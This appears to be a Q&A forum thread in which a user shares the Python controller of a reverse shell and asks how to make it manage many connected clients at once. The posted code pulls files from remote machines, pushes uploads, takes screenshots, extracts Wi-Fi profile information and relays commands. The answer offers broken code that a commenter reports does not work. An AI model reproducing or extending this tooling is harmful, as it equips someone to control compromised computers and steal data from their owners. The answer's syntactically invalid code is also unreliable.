# How to modify my Python reverse shell to handle multiple connections

Tags: python, shell, reverse

My code below create a server and listen for incoming connection and accept the connection from the client. So far the code works but I would like the code to accept multiple connections and have an initial interpreter that starts once the server has started and the initial interpreter can be used to list the connected clients, and select the the particular client the server wants to connect to and execute the control function on that variable.

```
import socket,struct,sys,os;from datetime import datetime
try: input = raw_input
except NameError: input = input


def help():
   print("""
Commands      Desscription
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:help         Show this help message

""")
def download(filee):
  cmd = filee
  filee = "".join(filee.split(":download")).strip()
  if filee.strip():
   filetodown = filee.split("/")[-1] if "/" in filee else filee.split("\\")[-1] if "\\" in filee else filee
   controler.send(cmd.encode("UTF-8"))
   down = controler.recv().decode("UTF-8",'ignore')
   if down == "true":
     print("[~] Downloading [ {} ]...".format(filetodown))
     wf = open(filetodown, "wb")
     while True:
      data = controler.recv()
      if data == b":DONE:": break
      elif data == b":Aborted:":
        wf.close()
        os.remove(filetodown)
        print("[!] Downloading Has Aborted By Client!")
        return
      wf.write(data)
     wf.close()
     print("[*] Download Complete :)\n[*] file Saved In : {}\n".format(os.getcwd()+os.sep+filetodown))
   else: print(down)
  else: print("Usage: :download <file_to_download_from_client_machine>\n")
def upload(cmd):
    filetoup = "".join(cmd.split(":upload")).strip()
    if not filetoup.strip(): print("usage: :upload <file_to_upload>\n")
    else:
       if not os.path.isfile(filetoup): print("error: open: no such file: "+filetoup+"\n")
       else:
          controler.send(cmd.encode("UTF-8"))
          print("[~] Uploading [ {} ]...".format(filetoup))
          with open(filetoup,"rb") as wf:
            for data in iter(lambda: wf.read(4100), b""):
              try:controler.send(data)
              except(KeyboardInterrupt,EOFError):
                wf.close()
                controler.send(b":Aborted:")
                print("[!] Uploading Has Been Aborted By User!\n")
                return
          controler.send(b":DONE:")
          savedpath = controler.recv().decode("UTF-8")
          print("[*] Upload Complete :)\n[*] File uploaded in : "+str(savedpath).strip()+" in client machine\n")

def check_con():
     print("[~] Checking....")
     controler.send(b":check_internet_connection")
     status = controler.recv().decode("UTF-8").strip()
     if status == "UP": print("[*] client: Connected to internet !\n")
     else: print("[!] client: Not Connected to internet !\n")


def screenshot():
    file_name = str(datetime.now().time())

    file_name = file_name.split(".")[0].replace(":", "-")
    file_name = file_name + '.png'
    with open(file_name, "wb") as f:
        image = controler.recv()
        f.write(image)
        while not ("completeServing" in str(image)):
            image = controler.recv()
            f.write(image)

def browse(cmd):
  url = "".join(cmd.split(":browse")).strip()
  if not url.strip(): print("Usage: :browse <Websute_URL>\n")
  else:
    if not url.startswith(("http://","https://")): url = "http://"+url
    print("[~] Opening [ {} ]...".format(url))
    controler.send(":browse {}".format(url).encode("UTF-8"))
    print("[*] Done \n")

def control():
    try:
      cmd = str(input("[{}]:~# ".format(a[0])))
      while not cmd.strip(): cmd = str(input("[{}]:~# ".format(a[0])))
      if cmd == ":help":
            help()
            control()
      elif ":download" in cmd:
            download(cmd)
            control()
      elif ":upload" in cmd:
           upload(cmd)
           control()
      elif cmd ==":kill":
         print("[!] Connection has been killed!")
         controler.send(b":kill")
         c.shutdown(2)
         c.close()
         s.close()
         exit(1)
      elif ":exec" in cmd:
           cmd = "".join(cmd.split(":exec")).strip()
           if not cmd.strip(): print("Usage: :exec <command>\n")
           else:
               print("[*] exec:")
               os.system(cmd)
               print(" ")
           control()
      elif cmd == ":check":
        check_con()
        control()
    

      
          
          


      elif cmd == ":wifi":
        print("[*] Geting Wifi profiles info...")
        controler.send(b":wifi")
        info = controler.recv()
        try:
          info = info.decode("UTF-8","ignore")
        except  UnicodeEncodeError: info = info
        finally:
           if info==":osnot:": print("[!] Sorry, i can't found wifi info of client machine!\n")
           else:
             print("[*] INFO:\n")
             print(info + "\n")
             control()
      elif ":browse" in cmd:
        browse(cmd)
        control()
      elif cmd.lower() == "cls" or cmd == "clear":
             os.system("cls||clear")
             control()
      controler.send(cmd.encode("UTF-8"))
      DATA = controler.recv()
      if "image" in DATA.decode("utf-8", "ignore"):
          screenshot()
          print('done')
          control()
      print((DATA.decode("utf-8", "ignore")), end = ' ')
      
          
      if DATA.strip(): print(DATA.decode("UTF-8",'ignore'))
      control()
    except (KeyboardInterrupt, EOFError):
           print(" ")
           control()
    except socket.error:
       print("[!] Connection Lost to: "+a[0]+" !")
       c.close()
       s.close()
       exit(1)
    except UnicodeEncodeError:
        print(DATA)
        print(" ")
        control()
    except Exception as e:
       print("[!] An error occurred: "+str(e)+"\n")
       control()
class senrev:
    def __init__(self,sock):
        self.sock = sock
    def send(self, data):
        pkt = struct.pack('>I', len(data)) + data
        self.sock.sendall(pkt)
    def recv(self):
        pktlen = self.recvall(4)
        if not pktlen: return ""
        pktlen = struct.unpack('>I', pktlen)[0]
        return self.recvall(pktlen)
    def recvall(self, n):
        packet = b''
        while len(packet) < n:
            frame = self.sock.recv(n - len(packet))
            if not frame:return None
            packet += frame
        return packet

def server(IP,PORT,senrev=senrev):
  global s
  global c
  global a
  global controler
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  s.bind((IP,PORT))
  s.listen(1)
  print("[*] Server started on > {}:{} < | at [{}]".format(IP,PORT,datetime.now().strftime("%H:%M:%S")))
  try:
    c,a = s.accept()
    controler = senrev(c)
    print("\n[*] Connection From {}:{}".format(a[0],a[1]))
    print("[*] type ':help' to show help message\n")
    control()
  except (KeyboardInterrupt,EOFError):
         print(" ")
         exit(1)
if len(sys.argv) !=3:
        print("Usage: python server.py <IP> <PORT>")
        exit(1)
server(sys.argv[1],int(sys.argv[2]))
```

I tried using thread but I was not familiar with it so this was all I could do. But this one too accepts one connection at a time and am unable to accept more.

```
import threading

def handle_client(c, a):
    global controler

    client = senrev(c)
    clients.append(client)
    print("\n[*] Connection From {}:{}".format(a[0], a[1]))
    print("[*] type ':help' to show help message\n")
    while True:
        print("Connected clients:")
        for i, client in enumerate(clients):
            print("[{}] {}:{}".format(i, a[0], a[1]))
        index = input("Select a client to control: ")
        try:
            index = int(index)
            if index < 0 or index >= len(clients):
                raise ValueError
            controler = clients[index]
            control(controler)
        except ValueError:
            print("[!] Invalid client index\n")

def server(IP, PORT, senrev=senrev):
    global s
    global a
    global c
    global clients
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((IP, PORT))
    s.listen(10)
    print("[*] Server started on > {}:{} < | at [{}]".format(IP, PORT, datetime.now().strftime("%H:%M:%S")))
    clients = []
    try:
        while True:
            c, a = s.accept()
            thread = threading.Thread(target=handle_client, args=(c, a))
            thread.start()
    except (KeyboardInterrupt, EOFError):
        print(" ")
        exit(1)


if len(sys.argv) !=3:
    print("Usage: python server.py <IP> <PORT>")
    exit(1)
    
server(sys.argv[1],int(sys.argv[2]))
```

Comment: Note [mre] guidelines, particularly the "minimal" part. If you have a long example and a short example and they both demonstrate the same problem, show _only_ the short example. (And simplify as much as you can: If you can produce the same problem with an echo service that doesn't do any reverse shell implementation at all, then you _should_ show only that simpler/shorter service)

Comment: BTW, why all the globals? If you're passing things around as parameters, you shouldn't need them to be global at all.

Comment: So how do I go about it

Answer (score 0):

```py
def server(IP, PORT, senrev=senrev):
    global s
    global a
    global c
    global clients
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((IP, PORT))
    s.listen(10)
    print("[*] Server started on > {}:{} < | at [{}]".format(IP, PORT, datetime.now().strftime("%H:%M:%S")))
    clients = []
    try:
        while True:
            c, a = s.accept()
            if c:
                thread = threading.Thread(target=handle_client, args=(c, a))
                thread.start()
    except KeyboardInterrupt:
        print(" ")
        exit(1)
```

in this case check if "c" is an empty, if it's not empty switch to thread, if that's not your problem, the problem is that you start multiple threads (depends how many clients are) on handle_client(). thread should be placed on **control()**, while **server() and handle_client() should be merged**, and add values whenever client shows up (like handle_client()) after s.accept()

```py
def server_and_handleclient(IP, PORT, senrev=senrev):
    global s
    global a
    global c
    global clients
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((IP, PORT))
    s.listen(10)
    print("[*] Server started on > {}:{} < | at [{}]".format(IP, PORT, datetime.now().strftime("%H:%M:%S")))
    clients = []
    try:
        while True:
            c, a = s.accept()
            if c:
                global controler
                client = senrev(c)
                clients.append(client)
                print("\n[*] Connection From {}:{}".format(a[0], a[1]))
                print("[*] type ':help' to show help message\n")
                print("Connected clients:")
                for i, client in enumerate(clients):
                    print("[{}] {}:{}".format(i, a[0], a[1]))
                index = input("Select a client to control: ")
                while True:
                    try:
                        index = int(index)
                        if index < 0 or index >= len(clients):
                            raise ValueError
                        controler = clients[index]
                    thread = threading.Thread(target=control, args=(controler))
                    thread.start()
                    except ValueError:
                        break
    except KeyboardInterrupt:
        print(" ")
        exit(1)
```

Comment: Do add some text to explain what you did different and why.

Comment: Add some explanations pls

Comment: Please the code you provided didn't work. Its not able to add new connection just only one